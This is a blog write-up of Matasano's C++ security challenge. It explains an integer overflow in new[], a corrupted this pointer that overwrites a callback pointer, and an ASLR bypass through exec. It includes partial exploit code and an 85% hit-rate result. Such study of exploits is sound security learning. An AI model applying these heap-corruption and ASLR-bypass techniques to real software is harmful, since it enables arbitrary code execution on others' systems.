If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter.

Important note

I am NOT a security researcher (I kinda want to be though). As such, there are probably way better ways to do everything in this article. This article is just illustrating my thought process when cracking this challenge.

The Challenge

The Matasano Security blog recently posted an article titled A C++ Challenge which included a particularly ugly piece of C++ code that has a security vulnerability. The challenge is for the reader to find the vulnerability, use it execute arbitrary code, and submit the data to Matasano.

Sounds easy enough, let’s do this! cue hacking music

Making it harder

Recent linux kernels have feature called Address Space Layout Randomization (ASLR) which can be set in /proc/sys/kernel/randomize_va_space . ASLR is a security feature which randomizes the start address of various parts of a process image. Doing this makes exploiting a security bug more difficult because the exploit cannot use any hard coded addresses.

The options you can set are:

0 – ASLR off

1 – Randomize the addresses of the stack, mmap area, and VDSO page. This is the default.

2 – Everything in option 1, but also randomize the brk area so the heap is randomized.

Just for fun I decided to set it to 2 to make exploiting the challenge more difficult.

Got the code, but now what?

I decided to start attacking this problem by looking for a few common errors, in this order:

strcpy()/strncpy() bugs No calls memcpy() bugs A few calls Off by one bugs None obvious

It turned out from a quick look that all calls to memcpy() included sane, hard-coded values. So, it had to be something more complex.

Digging deeper – finding input streams the user can control

Next, I decided to actually read the code and see what it was doing at a high level and what inputs could be controlled. Turns out that the program reads data from a file and uses the data from the file to determine how many objects to allocate.

Obviously, this portion of the code caught my interest so let’s take a quick look:

/* ... */ fd.read(file_in_mem, MAX_FILE_SIZE-1); /* ... */ struct _stream_hdr *s = (struct _stream_hdr *) file_in_mem; if(s->num_of_streams >= INT_MAX / (int)sizeof(int)) { safe_count = MAX_STREAMS; } else { safe_count = s->num_of_streams; } Obj *o = new Obj[safe_count];

OK, so clearly that if statement is suspect. At the very least it doesn’t check for negative values, so you could end up with safe_count = -1 which might do something interesting when passed to the new operator. Moreover, it appears this if statement will allow values as large as 536870910 ([INT_MAX / sizeof(int)] – 1).

Maybe the exploit has something to do with values this if statement is allowing through?

A closer look at the integer overflow in new

Let’s use GDB to take a closer look at what the compiler does before calling new. I’ve added a few comments in line to explain the assembly code:

mov %edx,%eax ; %edx and %eax store s->num_of_streams add %eax,%eax ; add %eax to itself (s->num_of_streams * 2) add %edx,%eax ; add s->num_of_streams + %eax (s->num_of_streams*3) shl $0x2,%eax ; multiply (s->num_of_streams * 3) by 4 (s->num_of_streams * 12) mov %eax,(%esp) ; move it into position to pass to new call 0x8048a7c ; call new

The compiler has generated code to calculate: s->num_of_streams * sizeof(Obj) . sizeof(Obj) is 12 bytes. For large values of s->num_of_streams multiplying it by 12, causes an integer overflow and the value passed to new will actually be less than what was intended.

For my exploit, I ended up using the value 357913943. This value causes an overflow, because 357913943 * 12 is greater than the biggest possible value for an integer by 20. So the value passed to new is 20. Which is, of course, significantly less than what we actually wanted to allocate. Other people have written about integer overflow in new in other compilers before.

Let’s see how this can be used to cause arbitrary code to execute. Remember, for arbitrary code execution to occur there must be a way to cause the target program to write some data to a memory address that can be controlled.

Find the (possible) hand-off(s) to arbitrary code

To find any hand-off locations, I looked for places where memory writes were occurring in the program. I found a few memory writes:

2 calls to memset()

2 calls to memcpy()

parse_stream() of class Obj

Unfortunately (from the attacker’s perspective) the calls to memcpy() and memset() looked pretty sane. The parse_stream() function caught my interest, though.

Take a look:

class Obj { public: int parse_stream(int t, char *stream) { type = t; // ... do something with stream here ... return 0; } int length; int type; /* ... */

REMEMBER: In C++, member functions of class es have a sekrit parameter which is a pointer to the object the function is being called on. In the function itself, this parameter is accessed using this . So the line writing to the type variable is actually doing this->type = t; where this is supplied to the function sektrily by the compiler.

This is important because this piece of code could be our hand-off! We need to find a way to control the value of this so we can cause a memory write to a location of our choice.

Controlling this to cause arbitrary code to execute

Take a look at an important piece of code in the challenge:

struct imetad { int msg_length; int (*callback)(int, struct imetad *); /* ... */

Nice! The callback field of struct imetad is offset by 4 bytes into the structure. The type field of class Obj is also offset by 4 bytes. See where I’m going?

If we can control the this pointer to point at the struct imetad on the heap when parse_stream is called, it will overwrite the callback pointer. We’ll then be able to set the pointer to any address we want and hand-off execution to arbitrary code!

But how can we manipulate this ?

Take a look at this piece of code that calls callback :

o[i].parse_stream(dword, stream_temp); imd->callback(o[i].type, imd);

Since it is possible to overflow new and allocate fewer objects than safe_count is counting, that means that for some values of i, o[i] will be pointing at data that isn’t actually an Obj object, but just other data on the heap. Infact, when i = 2 , o[i] will be pointing at the struct imetad object on the heap. The call to parse_stream will pass in a corrupted this pointer, that points at struct imetad . The write to type will actually overwrite callback since they are both offset equal amounts into their respective structures.

And with that, we’ve successfully exploited the challenge causing arbitrary code to execute.

Let’s now figure out how to beat ASLR!

How to defeat address space layout randomization

I did NOT invent this technique, but I read about it and thought it was cool. You can read a more verbose explanation of this technique here. The idea behind the technique is pretty simple:

When you call exec , the PID remains the same, but the image of the process in memory is changed.

, the PID remains the same, but the image of the process in memory is changed. The kernel uses the PID and the number of jiffies (jiffies is a fine-grained time measurement in the kernel) to pull data from the entropy pool.

If you can run a program which records stack, heap, and other addresses and then quickly call exec to start the vulnerable program, you can end up with the same memory layout.

My exploit program is actually a wrapper which records an approximate location of the heap (by just calling malloc() ), generates the exploit file, and then executes the challenge binary.

Take a look at the relevant pieces of my exploit to get an idea of how it works:

/* ... */ /* do a malloc to get an idea of where the heap lives */ void *dummy = malloc(10); /* ... */ unsigned int shell_addr = reinterpret_void_ptr_as_uint(dummy); /* * XXX TODO FIXME - on my platform, execl'ing from here to the challenge binary * incurs a constant offset of 0x3160, probably for changes in the environment * (libs linked for c++ and whatnot). */ shell_addr += 0x3160; /* * a guess as to how far off the heap the shellcode lives. * * luckily we have a large NOP sled, so we should only fail when we miss * the current entropy cycle (see below). */ shell_addr += 700; /* ... build exploit file in memory ... */ /* copy in our best guess as to the address of the shellcode, pray NOPs * take care of the rest! */ memcpy(entire_file+88, &shell_addr, sizeof(shell_addr)); /* ... write exploit out to disk ... */ /* launch program with the generated exploit file! * * calling execl here inherits the PID of this process, and IF we get lucky * ~85%+ of the time, we'll execute before the next entropy cycle and hit * the shellcode, even with ASLR=2. */ execl("./cpp_challenge", "cpp_challenge", "exploit", (char *)0);

My exploit for the C++ challenge

My exploit comes with the following caveats:

i386 system

The challenge binary is called “cpp_challenge” and lives in the same directory as the exploit binary.

The exploit binary can write to the directory and create a file called “exploit” which will be handed off to “cpp_challenge”

Get the full code of my exploit here.

Results

Results on my i386 Ubuntu 8.04 VM running in VMWare fusion, for each level of randomize_va_space:

0 – 100% exploit hit rate

exploit hit rate 1 – 100% exploit hit rate

exploit hit rate 2 – ~85% exploit hit rate. Sometimes, my exploit code falls out of the time window and the address map changes before the challenge binary is run

I could probably boost the hit rate for 2 a bit, but then I’d probably re-write the entire exploit in assembly to make it run as fast as possible. I didn’t think there was really a point to going to such an extreme, though. So, an 85% hit rate is good enough.

Conclusion

Security challenges are fun. More emphasis and more freely available information on secure coding would be very useful. Like it or not developers need to be security conscious when writing code in C and C++. As C and C++ change, developers need to carefully consider security implications of new features.

Thanks for reading and don’t forget to subscribe (via RSS or e-mail) and follow me on twitter.

References